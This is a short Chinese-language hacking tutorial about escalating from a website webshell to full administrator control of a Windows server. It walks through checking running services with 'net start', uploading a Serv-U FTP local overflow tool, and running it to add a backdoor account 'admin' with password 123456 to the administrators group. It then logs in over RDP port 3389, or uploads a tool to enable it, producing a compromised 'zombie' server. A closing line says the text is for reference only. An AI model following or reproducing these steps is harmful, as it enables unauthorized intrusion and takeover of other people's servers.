利用webshell得到管理权限一法

这里我们谈一下在取得了网站的wehshell后应该如何提升权限，使我们得到整台服务器的管理权权限，控

制整台服务器！
至于如何得到网站的Webshell这里我就不多说了，具体方法很多，大家可以找一些这方面的资料！
首先我们要进入shell找到可执行cmd命令的页面，执行net start命令，如果执行不成功，则说明些服务

器没有cmd权限，如果执行成功，则会显示出此服务器所开启的服务。我们只要找到服务器开启了下面两

个服务就可以了：
Serv-U FTP 服务器　这个开启了ftp服务　serv-u ftp服务可以本地溢出
Terminal Services　这个是开启了3389服务
然后我们上传一个名为FTP.exe的serv-u ftp服务可以本地溢出工具，比如我们把工具传到了Ｅ盘，那么

再在cmd命令处执行E:/ftp.exe "net user admin 123456 /add" 添加用户名为admin密码为123456的帐号

，然后执行E:/ftp.exe "net localgroup administrators admin /add"添加admin用户为管理员，然后用

3389登录器登录
如果服务器只是开启了ftp服务，得到权限后我们可以上传一个3389.exe开启3389终端服务
这样你就得到一台3389的肉鸡了。
这篇文章仅做为参考，如果有什么不对的地方还请大家指出，不要上去搞破坏哦～！